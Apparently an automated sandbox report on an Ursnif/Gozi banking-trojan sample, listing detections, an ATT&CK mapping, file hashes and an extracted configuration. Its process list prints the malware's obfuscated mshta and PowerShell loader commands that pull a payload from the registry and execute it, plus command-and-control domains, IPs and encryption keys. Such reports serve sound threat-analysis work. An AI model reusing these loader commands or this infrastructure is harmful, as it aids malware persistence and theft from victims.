Windows
Analysis Report
bf.exe
Overview
General Information
Detection
Ursnif
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Writes or reads registry keys via WMI
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- bf.exe (PID: 1364 cmdline: C:\Users\user\Desktop\bf.exe MD5: B7CE4F9F6ECD85BB5EDBB6964226FDB6)
- control.exe (PID: 4784 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
- mshta.exe (PID: 5064 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ffsw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ffsw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
- powershell.exe (PID: 4604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([System.Text.Encoding]::ASCII.GetString((rxihymmmsf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 5680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- csc.exe (PID: 6048 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
- cvtres.exe (PID: 4720 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE2A5.tmp" "c:\Users\user\AppData\Local\Temp\CSCC346B8403E7B4A1592C575AE3967513E.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- csc.exe (PID: 3340 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
- cvtres.exe (PID: 2888 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB8E.tmp" "c:\Users\user\AppData\Local\Temp\CSC1B282484FFBD4A98A4CBD8847ACCD8A8.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- cleanup
{"RSA Public Key": "GMoZf7gMROqzfy+P3mEeqSfHqIRAPg1d/uP2nOBLSR0sg89AdjGg/BLNdTPN8XbPrvLnZTlSAywg+YF//NxPkEZ+7hQVwoW+eGDjXjeTxnbr1pnuZAEZvZ5pJhvMSPakNawHi4xnL8zUKFcpnLcVW6aNM9fO9qEz02wFRvLZs5o11GrslLDYHDvQ0SD/opuDXOeSU7Ly+saXGzcMGJbb2gGYqQeP0wSX+OxMoI8G/dmzRLFFPaEi3LHTEkvTi4eHIKkf+2IdYYEmrS5ODeFooRl4Z5rjK+roU5Xa0a8yQ9B3bgnIiEzG4EM0+jPqnWnC8a0+x+5GseJTLbtpCdro7dXq/ZlwgpjCIEjV3+qceiU=", "c2_domain": ["trackingg-protectioon.cdn1.mozilla.net", "45.8.158.104", "trackingg-protectioon.cdn1.mozilla.net", "188.127.224.114", "weiqeqwns.com", "wdeiqeqwns.com", "weiqeqwens.com", "weiqewqwns.com", "iujdhsndjfks.com"], "botnet": "10103", "server": "50", "serpent_key": "AFRkxxddsKAnRl2J", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
Windows_Trojan_Gozi_fd494041 | unknown | unknown |
Windows_Trojan_Gozi_261f5ac5 | unknown | unknown |
Windows_Trojan_Gozi_fd494041 | unknown | unknown |
Windows_Trojan_Gozi_261f5ac5 | unknown | unknown |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
Data Obfuscation |
---|
Source: | Author: Joe Security: |
Timestamp: | 192.168.2.5 45.8.158.104 49696 80 2033204 10/13/22-09:30:54.079674 |
SID: | 2033204 |
Source Port: | 49696 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.5 45.8.158.104 49696 80 2033203 10/13/22-09:30:55.414317 |
SID: | 2033203 |
Source Port: | 49696 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Source: | Avira: |
Source: | Joe Sandbox ML: |
Source: | Avira: |
Source: | Malware Configuration Extractor: |
Source: | Static PE information: |
Source: | Binary string: | ||
Networking |
---|
Source: | Snort IDS: | ||
Source: | ASN Name: |
Source: | IP Address: |
Source: | HTTP traffic detected: | ||
Source: | DNS traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | String found in binary or memory: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: | ||
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | File source: | ||
E-Banking Fraud |
---|
Source: | File source: | ||
System Summary |
---|
Source: | Matched rule: | ||
Source: | WMI Queries: | ||
Source: | WMI Registry write: | ||
Source: | Static PE information: |
Source: | Matched rule: | ||
Source: | Binary or memory string: |
Source: | Key opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Virustotal: |
Source: | Static PE information: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Key value queried: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Mutant created: | ||
Source: | File read: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Binary string: | ||
Source: | Process created: | |||
Source: | File created: | Jump to dropped file | ||
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File source: | ||
Source: | IAT, EAT, inline or SSDT hook detected: |
Source: | User mode code has changed: |
Source: | IAT of a user mode module has changed: |
Source: | EAT of a user mode module has changed: |
Source: | Process information set: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Last function: |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior |
Source: | Process information queried: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Section loaded: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior |
Source: | Thread created: | Jump to behavior | ||
Source: | Process created: | |||
Source: | Binary or memory string: | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Key value queried: | Jump to behavior |
Source: | Code function: | 12_2_004963E0 |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Remote Access Functionality |
---|
Source: | File source: | ||
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 2 Windows Management Instrumentation | Path Interception | 412 Process Injection | 4 Rootkit | 3 Credential API Hooking | 1 Security Software Discovery | Remote Services | 1 Email Collection | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | 1 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Masquerading | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 3 Credential API Hooking | Exfiltration Over Bluetooth | 1 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 21 Virtualization/Sandbox Evasion | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Archive Collected Data | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 12 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 2 Software Packing | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 File and Directory Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 13 System Information Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
76% | Virustotal | Browse | ||
30% | Metadefender | Browse | ||
100% | Avira | TR/Crypt.XPACK.Gen7 | ||
100% | Joe Sandbox ML |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | TR/Crypt.XPACK.Gen7 | Download File |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
trackingg-protectioon.cdn1.mozilla.net | unknown | unknown | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false |
| low | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
45.8.158.104 | unknown | Russian Federation | 49392 | ASBAXETNRU | true |
Joe Sandbox Version: | 36.0.0 Rainbow Opal |
Analysis ID: | 722154 |
Start date and time: | 2022-10-13 09:27:32 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 8m 15s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | bf.exe |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 12 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 1 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.troj.expl.evad.winEXE@15/16@2/1 |
EGA Information: |
|
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): WMIADAP.exe, WmiPrvSE.exe
- Execution Graph export aborted for target mshta.exe, PID 5064 because there are no executed functions
- Not all processes were analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description |
---|---|---|
09:31:04 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
45.8.158.104 | Get hash | malicious | Browse | ||
⊘No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
ASBAXETNRU | Get hash | malicious | Browse |
⊘No context
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 11606 |
Entropy (8bit): | 4.883977562702998 |
Encrypted: | false |
SSDEEP: | 192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr |
MD5: | 1F1446CE05A385817C3EF20CBD8B6E6A |
SHA1: | 1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D |
SHA-256: | 2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE |
SHA-512: | 252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1196 |
Entropy (8bit): | 5.333915035046385 |
Encrypted: | false |
SSDEEP: | 24:3aZPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJF9G:qZPerB4nqRL/HvFe9t4Cv94anG |
MD5: | B15D7C50C640BEF4A1E823CE568A5E5E |
SHA1: | E456E2EE754F8FBA38F8F75858491258896C9E41 |
SHA-256: | A95974F134C10C31BF7B1243C3E5F3987F1CC878565E28182DEC577D552450C0 |
SHA-512: | B7E7D0303E3DCF81217B7AC871AF1C4871D8BA19CC595DB35A6640108411126666D244D8CF91D766E129E7306FBCBA9622746DF74EC030E180CFDEDB78239107 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 418 |
Entropy (8bit): | 5.060887643546001 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuYl85FNVMRSR7a1X+o6RwuSRa+rVSSRnA/fMMLjUgL/Qy:V/DTLDfufVM62l9rV5nA/kePIy |
MD5: | 19FD6F555AD7C58D574C00F46F087B02 |
SHA1: | 025EC4778721F20FDBFF775EDD2351BAEA93846C |
SHA-256: | 9D08DF39AD05BD4A53F416AB8EF6A2FCA313EB9A1498E451284B445BB1830DAC |
SHA-512: | 188488549588E593523DDAB3A8372D47E016841C3CE1594A456C0AC7C73763A3AE1E8A5FFFDC7B6455BD869D0F6BDEBD6B6BCB2AA6A6B4CF658231CE72DC40B9 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 353 |
Entropy (8bit): | 5.245731191650942 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fFJ0zxs7+AEszI923fHyWHn:p37Lvkmb6KztJ0WZE2qAn |
MD5: | 4B8045D39F538756B8B62138A26F11E9 |
SHA1: | 95874A0DCB5655188CFD8602A1A4DCD01B521B96 |
SHA-256: | B3C78ADC05D493C0E52386D05C77480C94B732423C3B7349DF6DA13F9C5E2F41 |
SHA-512: | 8C66F125151F75F4DDC2FB9062D001DCC25942DE34AB42C389D0D17E36AE2C3AABB6C5FDA9157D9BC966691A5A868B9387FA2F998EA301303B87C55EDF1B7C32 |
Malicious: | true |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.6453992775319892 |
Encrypted: | false |
SSDEEP: | 24:etGSG8mmUgtJ85HIf/EEOnV4qmShytkZf4FexdVWpEWI+ycuZhN0xmGakSfxmXPE:6wXgt65oinB1J4FcdVyn1ulWa3iq |
MD5: | 5C4B891208032DBA1A02263355E4E9DE |
SHA1: | 1BD3E625D095A101173CAF1D794FE92AD02D0C4E |
SHA-256: | 004F167A5796CA987BCC5D4FAC040D72A10D39450F74A13147E72C0DCEC80AA4 |
SHA-512: | 224AEE577A4B6F6F804C82B26512FC201C78D213EAB1F983306F12AD456B57C77849E5D91DC22B54820B080220EA2A64753896960B98C349DBBA59AF6942E940 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 850 |
Entropy (8bit): | 5.317499521256793 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KztJVE21uKaM5DqBVKVrdFAMBJTH:Akka6aDVE2QKxDcVKdBJj |
MD5: | 967799D658DF042EC73377D634879017 |
SHA1: | 65B430F7577DF05F38080FFC1165C97BD6EDC1F2 |
SHA-256: | 26533FAEFCD5B67D4B81CC17D362A2A238120A044B92C4CB55E662CFE4C2C085 |
SHA-512: | B4A0A2B0D8DC98F78E68476EC113B1872A2F51C9D4AC9A3AD84DA2697501C3CC2349B1772B4DCD650E91CE9F76A46B0678603A204ABBB2DF2F21E7960FEBD16A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.071104180333077 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry0ak7YnqqKPN5Dlq5J:+RI+ycuZhNiakSKPNnqX |
MD5: | 77F267516B1EB24FF441C7AEFFE7CEEA |
SHA1: | 919FD845A3D90A83436CD074A4859048C5B8B64F |
SHA-256: | 054F1B995460C13C56857907432CB6A8F7C02F68BF403D75DF681011D52B8640 |
SHA-512: | 4B787F2F398D6E56E820D37D83E4586E9D927A4C8B2EAD2C91BF9057D392CFDFFCAAA79E5B663DE4DD7DF8366D95766A9A956E18B479DE10241A80986E92119F |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.0985185644301043 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry2lxmGak7YnqqFlxmXPN5Dlq5J:+RI+ycuZhN0xmGakSfxmXPNnqX |
MD5: | E73626B90519176EF74EEFA1FBBF8359 |
SHA1: | B83852A543258A18918D5FCAC5B70AB5BA0D2B93 |
SHA-256: | 3CBC786D97DE3D7A7F7F9E537EB4143D0085294DF5A1A5F80059D4644397BC45 |
SHA-512: | 02D0C8C4FF7ABE946BA74DA1C0FF87063DC27EB25F062D8E59A9AF5CD7CE6FA98C5936DBA4EE1888702A70287D94B95F8BE624852F331455E8920819F61D0E00 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1320 |
Entropy (8bit): | 3.9871089313851615 |
Encrypted: | false |
SSDEEP: | 24:HMnW9BiyQr68uHghKdNII+ycuZhN0xmGakSfxmXPNnq9hgd:KsiXuiKdu1ulWa3iq9y |
MD5: | 34E8D570049C9D06F2FF7C67BB1CE119 |
SHA1: | CFC0D654192DD0A7F2B6791AD807B30040F62283 |
SHA-256: | 1F149258DAFCB5E28457E7290144535E4A82EE26B50707128325DB8ABEDEC660 |
SHA-512: | FDE97C0EB9559A196EF12B4C91CA2C0981A9F75991430C6759E24BBD03709A806D270BE6458B6A13CAA04D674FC23D93F3CE34E0185243CDCA58F158CD1ABB0B |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1320 |
Entropy (8bit): | 3.9582729102086303 |
Encrypted: | false |
SSDEEP: | 24:HynW9Bit0iuuH5hKdNII+ycuZhNiakSKPNnq9hgd:UsitwunKdu1ulia3mq9y |
MD5: | 8C3DC050387A0493058D36D4B6CF27B1 |
SHA1: | C88C189BBA9142F115A3A17D15A9B422B56D37D3 |
SHA-256: | CB62F45C1C604DFB9C20DF39F2071D92D6C48BF98D668D356D3E0CF764434AC8 |
SHA-512: | 29DCB6B3FA9333F4DB07DF839AF10638859AD132690E9476B532DA7BF35FA51E5C723D05807073620B66F29AA42C33DD38498D89EA43E12FD24B68828E1BFEFC |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 400 |
Entropy (8bit): | 4.978058994390849 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuYl8HPMRSRa+eNMjSSRru+LjGVZfmaSRNEolEimZlRBPFQy:V/DTLDfuJ9eg5ru+Ly8yWEPlRBiy |
MD5: | F31A91CB873D422F30E84BFC6F0E4919 |
SHA1: | 87946E5B050BC8C66C9F04EBB9F82E210522D8EE |
SHA-256: | 91AF8FC99B650C87F7C49FAA1E0499F673E034ED712EB62782CFACBDF8329F84 |
SHA-512: | 242E12D8C01EF5BF6866FC09BD8A4AB9FB6C7EA1AC4BEAD56610DB30F15F0C7B38D7DA8706AB4BB8AD5647D5B2CCFB9717B85324CA0099C6DCDD7FDE13E5906B |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 353 |
Entropy (8bit): | 5.190119417850032 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fGFzxs7+AEszI923fGA:p37Lvkmb6KzuWZE2j |
MD5: | 6F676A14F55792FCAF9AB8D3BC3930D3 |
SHA1: | C2FFBC5923D1AE477656A42CF3E983524AFD5687 |
SHA-256: | FBA75ABB7F20F45450B907669B0A0D01A02D060A647A1E14425338A3CB32A807 |
SHA-512: | D76EB02D9B0A4551FCC56485E85FA8992A8920D2361CBB4D9D721F2804BEF087B9BB603CA32EE8CB5EAE591F12C14D8D7578BB476C2D5FC385867D3D4148C60F |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.604625908121872 |
Encrypted: | false |
SSDEEP: | 48:6CXQ3r5BAbBicLCL1Wh4JeL31ulia3mq:8b5BiLVuEK |
MD5: | D6661E74516E95B8506921C266FCC378 |
SHA1: | D4A317550C91B8D1BAC27056A2D176D2A46195E7 |
SHA-256: | B86245487032D5B0AB8C861DC33CF96333D046394F3A4CB83E586B92504BF63C |
SHA-512: | 6BB01F1FCD2617BF8BFEB7757278ECD3A5F2A2FC46D72661E148E485BFB511B8E6C483794D444C98573BFB655FC12389331DDD89E268D64BBAF8361A3F957215 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 850 |
Entropy (8bit): | 5.294801983238796 |
Encrypted: | false |
SSDEEP: | 12:xKIR37Lvkmb6KzuWZE2CKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KzvE2CKaM5DqBVKVrdFAMBJTH |
MD5: | E21C14E505268332566B043E3A794256 |
SHA1: | F402FC38AAD9C5B16B90C809E71CE61FBD5B6E53 |
SHA-256: | 568B3CC6ED8389B85718933FE231DB4152F86EC9865A81C6E2284D3DB23E1710 |
SHA-512: | D50F72A3E315A1C8FED7B20B35106AC4AB5FC012C3B0AB6F1B5A2EF30D08518DAA93D14559D39B2A785B9E9180F072A4072E69670DA49D4BCC6889BF245EB11F |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.519660398973527 |
TrID: |
|
File name: | bf.exe |
File size: | 37888 |
MD5: | b7ce4f9f6ecd85bb5edbb6964226fdb6 |
SHA1: | 12b28a42e960dfc522348eba37b00ea74a0df527 |
SHA256: | bf5845a6b0df356338cc4ae53dd2cdefcb114bd95f351e55fd430cee5408ffeb |
SHA512: | 1f5588d5b0816bbfc51394f434a9a80a96c68b66ca86a6a3cd53d64bf6a63751902c5f782a15522749231022c2695c6df7fbc604ae1d242f21554269f6d31e86 |
SSDEEP: | 768:7QLm41fM01vAoyRdq63goMWPXE2bE/JVMq2LATqeeAeOu2D2wqmLiuU:7L41fMSvVAdqlaPGhVMq2LpeReOb2Pmm |
TLSH: | FD03D1A76BA004BAC9D383353A396685DF441332423958E0E7BB4A398BD6C4FD56F713 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y..+...x...x...x..lx...x...xQ..x...x...x..vx...x..kx...x..nx...xRich...x........PE..L.....%c............................/...... |
Icon Hash: | 00828e8e8686b000 |
Entrypoint: | 0x40182f |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | EXECUTABLE_IMAGE, 32BIT_MACHINE |
DLL Characteristics: | NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x632596C9 [Sat Sep 17 09:43:37 2022 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | 1640d668d1471f340cbe565fe63522f6 |
Instruction |
---|
push esi |
